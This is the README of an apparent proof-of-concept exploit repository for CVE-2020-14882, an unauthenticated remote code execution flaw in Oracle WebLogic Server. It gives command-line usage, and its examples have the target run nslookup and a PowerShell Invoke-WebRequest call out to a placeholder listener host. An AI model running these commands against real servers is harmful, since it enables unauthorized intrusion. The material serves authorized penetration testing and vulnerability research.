This script allows for remote code execution (RCE) on Oracle WebLogic Server# CVE-2020-14882
This script enables remote code execution (RCE) on Oracle WebLogic Server using an unauthenticated GET request. It exploits the vulnerability CVE-2020-14882. By executing arbitrary commands, an attacker can gain unauthorized access to the server.
## Exploit Details
- Exploit Title: Oracle WebLogic Server, Unauthenticated RCE via GET request
- Exploit Author: Danny Safaya
- CVE: CVE-2020-14882
- Vendor Homepage: [Oracle WebLogic Server](https://www.oracle.com/middleware/technologies/weblogic.html)
- Software Link: [Oracle Middleware Downloads](https://www.oracle.com/technetwork/middleware/downloads/index.html)
- More Info: [WebLogic RCE by only one GET request (CVE-2020-14882) analysis](https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf)
## Usage
Make sure you have Python 3 installed. To use this script, follow the steps below:
1. Open a terminal or command prompt.
2. Run the script using the following command:
```
python3 exploit.py http(s)://target:7001 command
```
Replace `http(s)://target:7001` with the target URL of the Oracle WebLogic Server, and `command` with the desired command to execute.
**Example 1:**
```
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
```
This example executes the command `nslookup your_Domain` on the target server.
**Example 2:**
```
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
```
This example executes the PowerShell command `Invoke-WebRequest -Uri http://your_listener` on the target server.
## Warning
**This script is intended for authorized penetration testing and security research purposes only.** Unauthorized use of this script to exploit systems without proper consent is illegal and may result in legal consequences. Use it at your own risk.
## Dependencies
This script requires the following dependencies:
- `requests`
- `urllib3`
Please ensure that these dependencies are installed before running the script.
---
[4.0K] /data/pocs/3c4ecf076e6785cbb96406c6e6387e7857febbb6
├── [ 34K] LICENSE
├── [1.0K] main.py
└── [2.0K] README.md
0 directories, 3 files